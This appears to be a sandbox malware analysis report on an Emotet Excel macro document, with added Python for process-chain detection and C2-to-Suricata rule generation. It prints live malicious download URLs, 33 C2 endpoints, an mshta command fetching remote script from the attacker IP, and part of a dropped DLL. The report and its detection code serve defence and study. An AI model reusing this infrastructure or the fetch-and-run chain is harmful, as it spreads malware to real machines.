Windows Analysis Report
DOCUMENT_2801.xls

Overview

General Information

Sample Name: DOCUMENT_2801.xls
Analysis ID: 562416
MD5: 3f397d9cca325167d86d575896d40207
SHA1: 54b8106c1715eb58230371fa033cbdec1e3aaeff
SHA256: f695adbe8668cdef7b307bc0fc89a664d8002b42dc91b8a01a75aec4cfc9018c
Tags: SilentBuilderxls

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Passes commands via pipe to a shell (likely to bypass AV or HIPS)
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
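Several of the Sigma hits in the list above (Microsoft Office Product Spawning Windows Shell, MSHTA Spawning Windows Shell, Windows Shell File Write to Suspicious Folder) and the dropped C:\ProgramData\Milossd.dll together describe one parent/child chain: EXCEL.EXE starts cmd.exe, which runs mshta.exe against the remote .html, which runs PowerShell, which drops the DLL and hands it to rundll32.exe. The Python below is an added example, not part of this Joe Sandbox report, that applies those three checks to process-creation records and reconstructs the ancestry of every hit. The records are constructed: the image paths, the mshta URL and the DLL path come from the report, but the report does not show the command lines, and the ",#1" entry point on the rundll32 line is a placeholder.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 style). Constructed for this example."""
    pid: int
    ppid: int
    image: str     # full path of the created process
    cmdline: str   # command line as logged


OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe",
          "rundll32.exe", "regsvr32.exe"}
# User-writable folders from which a signed rundll32 has no business loading a DLL.
WRITABLE_DIRS = ("\\programdata\\", "\\appdata\\", "\\users\\public\\", "\\windows\\temp\\")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(index: Dict[int, ProcEvent], pid: int) -> List[str]:
    """Image basenames from the oldest known ancestor down to pid (loop-safe on recycled PIDs)."""
    chain, seen = [], set()
    cur = index.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(basename(cur.image))
        cur = index.get(cur.ppid)
    return chain[::-1]


def detect(events: List[ProcEvent]) -> List[Tuple[str, int, List[str]]]:
    """Return (rule, pid, ancestry) for every record that matches one of the three checks."""
    index = {e.pid: e for e in events}
    alerts = []
    for e in events:
        child = basename(e.image)
        parent = index.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        if pname in OFFICE and child in SHELLS:            # Office product spawning a shell
            alerts.append(("office_spawns_shell", e.pid, ancestry(index, e.pid)))
        if pname == "mshta.exe" and child in SHELLS:       # MSHTA spawning a shell
            alerts.append(("mshta_spawns_shell", e.pid, ancestry(index, e.pid)))
        if child == "rundll32.exe":                        # rundll32 loading a DLL from a writable folder
            cl = e.cmdline.lower()
            if ".dll" in cl and any(d in cl for d in WRITABLE_DIRS):
                alerts.append(("rundll32_dll_from_writable_dir", e.pid, ancestry(index, e.pid)))
    return alerts


# Constructed records. Images, the mshta URL and the DLL path are from the report; the command
# lines are not, and ",#1" is a placeholder for the entry point the report does not show.
SAMPLE_EVENTS = [
    ProcEvent(400, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1000, 400, r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
              '"EXCEL.EXE" DOCUMENT_2801.xls'),
    ProcEvent(1100, 1000, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(1200, 1100, r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://91.240.118.172/ee/ss/se.html"),
    ProcEvent(1300, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe"),
    ProcEvent(1400, 1300, r"C:\Windows\SysWOW64\rundll32.exe",
              r"rundll32.exe C:\ProgramData\Milossd.dll,#1"),
    # Benign activity that must not fire: an interactive cmd, and a legitimate rundll32 use.
    ProcEvent(2000, 400, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(2100, 2000, r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    ProcEvent(2200, 400, r"C:\Windows\System32\rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for rule, pid, chain in detect(SAMPLE_EVENTS):
        print(f"{rule:32} pid={pid:<5} {' -> '.join(chain)}")
```

Reporting the full ancestry with each hit is what turns three separate Sigma-style alerts into one incident: the rundll32 hit alone looks like a DLL load from ProgramData, but its chain shows it hangs off an Excel process, which is the fact a responder acts on.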

Classification

AV Detection

Source: http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/PE3 Avira URL Cloud: Label: malware
Source: http://engaz.shop/wp-content/MOllqUm2nb/PE3 Avira URL Cloud: Label: malware
Source: http://engaz.shop/wp-content/MOllqUm2nb/ Avira URL Cloud: Label: malware
Source: https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.172/ee/ss/se.html Avira URL Cloud: Label: malware
Source: http://3-fasen.com/wp-content/3Bl0hBbW/PE3 Avira URL Cloud: Label: malware
Source: https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/ Avira URL Cloud: Label: malware
Source: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK1 Avira URL Cloud: Label: malware
Source: https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/ Avira URL Cloud: Label: malware
Source: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/PE3 Avira URL Cloud: Label: malware
Source: https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/PE3 Avira URL Cloud: Label: malware
Source: http://tunbridgeservices.com/jfoeqhxz/zOX0/PE3 Avira URL Cloud: Label: malware
Source: https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/PE3 Avira URL Cloud: Label: malware
Source: http://tamiladsense.com/wp-inclu Avira URL Cloud: Label: malware
Source: http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/ Avira URL Cloud: Label: malware
Source: http://imaginariumstore.fun/ncsb Avira URL Cloud: Label: malware
Source: https://mypurealsystem.com/App_Start/Rhh8lKO/PE3 Avira URL Cloud: Label: malware
Source: https://ecobaby.pi-dh.com/Serend Avira URL Cloud: Label: malware
Source: http://3-fasen.com/wp-content/3B Avira URL Cloud: Label: malware
Source: http://onexone.elementor.cloud/c Avira URL Cloud: Label: malware
Source: http://3-fasen.com/wp-content/3Bl0hBbW/ Avira URL Cloud: Label: malware
Source: http://engaz.shop/wp-content/MOl Avira URL Cloud: Label: malware
Source: https://mypurealsystem.com/App_Start/Rhh8lKO/ Avira URL Cloud: Label: malware
Source: https://vn.minino.com/wp-admin/c3WQa/PE3 Avira URL Cloud: Label: malware
Source: https://vn.minino.com/wp-admin/c3WQa/ Avira URL Cloud: Label: malware
Source: http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/ Avira URL Cloud: Label: malware
Source: http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/PE3 Avira URL Cloud: Label: malware
Source: http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/ Avira URL Cloud: Label: malware
Source: http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/ Avira URL Cloud: Label: malware
Source: http://tamiladsense.com Avira URL Cloud: Label: malware
Source: http://tunbridgeservices.com/jfoeqhxz/zOX0/ Avira URL Cloud: Label: malware
Source: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/ Avira URL Cloud: Label: malware
Source: http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.172/ee/ss/se.png Avira URL Cloud: Label: malware
Source: http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/PE3 Avira URL Cloud: Label: malware
Source: https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/ Avira URL Cloud: Label: malware
Source: 17.2.rundll32.exe.3090000.27.unpack Malware Configuration Extractor: Emotet {"C2 list": ["74.207.230.120:8080", "139.196.72.155:8080", "37.44.244.177:8080", "37.59.209.141:8080", "116.124.128.206:8080", "217.182.143.207:443", "54.37.228.122:443", "203.153.216.46:443", "168.197.250.14:80", "207.148.81.119:8080", "195.154.146.35:443", "78.46.73.125:443", "191.252.103.16:80", "210.57.209.142:8080", "185.168.130.138:443", "142.4.219.173:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "190.90.233.66:443", "104.131.62.48:8080", "62.171.178.147:8080", "185.148.168.15:8080", "54.38.242.185:443", "198.199.98.78:8080", "194.9.172.107:8080", "85.214.67.203:8080", "66.42.57.149:443", "185.148.168.220:8080", "103.41.204.169:8080", "128.199.192.135:8080", "195.77.239.39:8080", "59.148.253.194:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}
Source: DOCUMENT_2801.xls ReversingLabs: Detection: 16%
Source: tamiladsense.com Virustotal: Detection: 7%
Source: C:\ProgramData\Milossd.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 13_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_0035BAEA FindFirstFileW, 17_2_0035BAEA
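The Malware Configuration Extractor line above yields two things worth acting on: the C2 list and two base64 public keys. The keys are Windows CNG BCRYPT_ECCKEY_BLOB structures: a 4-byte magic (ECK1 for an ECDH P-256 public key, ECS1 for an ECDSA P-256 public key), a little-endian 32-bit key length, then the big-endian X and Y coordinates of the curve point. The Python below is an added example, not part of this report, that decodes both blobs, checks magic, length and the P-256 curve equation, validates every C2 entry as IPv4:port, and turns the list into Suricata rules. The configuration is copied from the report; the sid range is an arbitrary local-rule assumption.

```python
import base64
import struct
from collections import Counter
from typing import Dict, List, Tuple

# Configuration as printed in the "Malware Configuration Extractor" line of this report
# (source 17.2.rundll32.exe.3090000.27.unpack).
EMOTET_CONFIG = {
    "C2 list": [
        "74.207.230.120:8080", "139.196.72.155:8080", "37.44.244.177:8080", "37.59.209.141:8080",
        "116.124.128.206:8080", "217.182.143.207:443", "54.37.228.122:443", "203.153.216.46:443",
        "168.197.250.14:80", "207.148.81.119:8080", "195.154.146.35:443", "78.46.73.125:443",
        "191.252.103.16:80", "210.57.209.142:8080", "185.168.130.138:443", "142.4.219.173:8080",
        "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "190.90.233.66:443",
        "104.131.62.48:8080", "62.171.178.147:8080", "185.148.168.15:8080", "54.38.242.185:443",
        "198.199.98.78:8080", "194.9.172.107:8080", "85.214.67.203:8080", "66.42.57.149:443",
        "185.148.168.220:8080", "103.41.204.169:8080", "128.199.192.135:8080", "195.77.239.39:8080",
        "59.148.253.194:443",
    ],
    "Public Key": [
        "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0",
        "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW",
    ],
}

# NIST P-256 field prime and curve constant b, for the on-curve check y^2 = x^3 - 3x + b (mod p).
P256_P = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
P256_B = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B

# Windows CNG BCRYPT_ECCKEY_BLOB layout: magic (4) || cbKey (LE uint32) || X (cbKey, BE) || Y (cbKey, BE).
ECC_MAGICS = {
    b"ECK1": "ECDH P-256 public key",   # BCRYPT_ECDH_PUBLIC_P256_MAGIC
    b"ECS1": "ECDSA P-256 public key",  # BCRYPT_ECDSA_PUBLIC_P256_MAGIC
}


def parse_ecc_public_blob(b64: str) -> Dict[str, object]:
    """Decode one base64 BCRYPT_ECCKEY_BLOB and sanity-check it; ValueError on malformed input."""
    blob = base64.b64decode(b64, validate=True)
    if len(blob) < 8:
        raise ValueError("blob shorter than the 8-byte BCRYPT_ECCKEY_BLOB header")
    magic = blob[:4]
    cb_key = struct.unpack_from("<I", blob, 4)[0]
    if magic not in ECC_MAGICS:
        raise ValueError(f"unknown ECC blob magic {magic!r}")
    if cb_key != 32 or len(blob) != 8 + 2 * cb_key:
        raise ValueError(f"unexpected cbKey={cb_key} for a blob of {len(blob)} bytes")
    x = int.from_bytes(blob[8:8 + cb_key], "big")
    y = int.from_bytes(blob[8 + cb_key:8 + 2 * cb_key], "big")
    on_curve = x < P256_P and y < P256_P and (y * y - (x * x * x - 3 * x + P256_B)) % P256_P == 0
    return {"magic": magic.decode("ascii"), "use": ECC_MAGICS[magic], "x": x, "y": y, "on_curve": on_curve}


def parse_c2_list(entries: List[str]) -> List[Tuple[str, int]]:
    """Validate 'ip:port' strings so a mangled config entry cannot become a bad firewall or IDS rule."""
    c2 = []
    for entry in entries:
        host, sep, port_s = entry.rpartition(":")
        octets = host.split(".")
        if not sep or len(octets) != 4 or not all(o.isdigit() and int(o) <= 255 for o in octets):
            raise ValueError(f"not an IPv4 address:port entry: {entry!r}")
        if not port_s.isdigit() or not 1 <= int(port_s) <= 65535:
            raise ValueError(f"bad port in {entry!r}")
        c2.append((host, int(port_s)))
    return c2


def port_histogram(c2: List[Tuple[str, int]]) -> Counter:
    return Counter(port for _, port in c2)


def suricata_rules(c2: List[Tuple[str, int]], sid_base: int = 9000000) -> List[str]:
    """One alert rule per C2 endpoint. sid_base is an assumed local-rule range, not a published SID."""
    return [
        f'alert tcp $HOME_NET any -> {ip} {port} (msg:"Emotet C2 contact {ip}:{port}"; '
        f'flow:to_server; classtype:trojan-activity; sid:{sid_base + i}; rev:1;)'
        for i, (ip, port) in enumerate(c2)
    ]


if __name__ == "__main__":
    for key in EMOTET_CONFIG["Public Key"]:
        info = parse_ecc_public_blob(key)
        print(f"{info['magic']}: {info['use']}, on curve: {info['on_curve']}")
    endpoints = parse_c2_list(EMOTET_CONFIG["C2 list"])
    print(f"{len(endpoints)} C2 endpoints by port: {dict(port_histogram(endpoints))}")
    print("\n".join(suricata_rules(endpoints)))
```

The magic and length checks matter because extractors occasionally misread a key; a decoded blob that is not a valid P-256 point is a sign the extraction, not the sample, is wrong. The port histogram is a quick reminder that 443 and 8080 dominate this list, so port-based egress filtering alone will not catch the beaconing.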

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80
Source: global traffic DNS query: name: tamiladsense.com
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80

Networking

Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.172:80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 74.207.230.120 144
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 139.196.72.155 144
Source: Malware configuration extractor IPs: 74.207.230.120:8080
Source: Malware configuration extractor IPs: 139.196.72.155:8080
Source: Malware configuration extractor IPs: 37.44.244.177:8080
Source: Malware configuration extractor IPs: 37.59.209.141:8080
Source: Malware configuration extractor IPs: 116.124.128.206:8080
Source: Malware configuration extractor IPs: 217.182.143.207:443
Source: Malware configuration extractor IPs: 54.37.228.122:443
Source: Malware configuration extractor IPs: 203.153.216.46:443
Source: Malware configuration extractor IPs: 168.197.250.14:80
Source: Malware configuration extractor IPs: 207.148.81.119:8080
Source: Malware configuration extractor IPs: 195.154.146.35:443
Source: Malware configuration extractor IPs: 78.46.73.125:443
Source: Malware configuration extractor IPs: 191.252.103.16:80
Source: Malware configuration extractor IPs: 210.57.209.142:8080
Source: Malware configuration extractor IPs: 185.168.130.138:443
Source: Malware configuration extractor IPs: 142.4.219.173:8080
Source: Malware configuration extractor IPs: 118.98.72.86:443
Source: Malware configuration extractor IPs: 78.47.204.80:443
Source: Malware configuration extractor IPs: 159.69.237.188:443
Source: Malware configuration extractor IPs: 190.90.233.66:443
Source: Malware configuration extractor IPs: 104.131.62.48:8080
Source: Malware configuration extractor IPs: 62.171.178.147:8080
Source: Malware configuration extractor IPs: 185.148.168.15:8080
Source: Malware configuration extractor IPs: 54.38.242.185:443
Source: Malware configuration extractor IPs: 198.199.98.78:8080
Source: Malware configuration extractor IPs: 194.9.172.107:8080
Source: Malware configuration extractor IPs: 85.214.67.203:8080
Source: Malware configuration extractor IPs: 66.42.57.149:443
Source: Malware configuration extractor IPs: 185.148.168.220:8080
Source: Malware configuration extractor IPs: 103.41.204.169:8080
Source: Malware configuration extractor IPs: 128.199.192.135:8080
Source: Malware configuration extractor IPs: 195.77.239.39:8080
Source: Malware configuration extractor IPs: 59.148.253.194:443
Source: global traffic HTTP traffic detected:
    GET /ee/ss/se.png HTTP/1.1
    Host: 91.240.118.172
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /wp-includes/BEADvqGgemV8SnTX/ HTTP/1.1
    Host: tamiladsense.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveSet-Cookie: 61f44ecc07555=1643400908; expires=Fri, 28-Jan-2022 20:16:08 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 20:15:08 GMTExpires: Fri, 28 Jan 2022 20:15:08 GMTContent-Type: application/x-msdownloadContent-Disposition: attachment; filename="XrEtCt.dll"Content-Transfer-Encoding: binaryContent-Length: 557056Date: Fri, 28 Jan 2022 20:15:08 GMTData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 91 fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 20 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 10 00 00 5d f5 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 
45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 76 02 00 00 a0 05 00 00 80 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 76 93 00 00 00 20 08 00 00 a0 00 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected:
    GET /ee/ss/se.html HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 91.240.118.172
    Connection: Keep-Alive
Source: Joe Sandbox View ASN Name: AS-CHOOPAUS
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS
Source: Joe Sandbox View IP Address: 207.148.81.119
Source: Joe Sandbox View IP Address: 104.131.62.48
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 74.207.230.120:8080
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 139.196.72.155:8080
Source: unknown Network traffic detected: IP country count 15
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://3-fasen.c
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://3-fasen.com/wp-content/3B
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://3-fasen.com/wp-content/3Bl0hBbW/
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://3-fasen.com/wp-content/3Bl0hBbW/PE3
Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172
Source: DOCUMENT_2801.xls.0.dr String found in binary or memory: http://91.240.118.172/ee/ss/se.html
Source: mshta.exe, 00000006.00000003.415186421.000000000314D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/ee/ss/se.htmlfunction
Source: mshta.exe, 00000006.00000003.414502711.0000000003145000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/ee/ss/se.htmlhttp://91.240.118.172/ee/ss/se.html
Source: mshta.exe, 00000006.00000003.428424323.00000000040DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.427844761.00000000040DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.412617394.00000000040DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.433058972.00000000040DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/ee/ss/se.htmli
Source: mshta.exe, 00000006.00000002.429411187.000000000048E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/ee/ss/se.htmlngs
Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/ee/ss/se.p
Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.670073907.000000001B6A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/ee/ss/se.png
Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/ee/ss/se.pngPE3
Source: mshta.exe, 00000006.00000003.412876273.000000000053F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.430034442.000000000053F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.428162711.000000000053F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.17f
Source: rundll32.exe, 0000000E.00000002.559655343.000000000032A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.11x
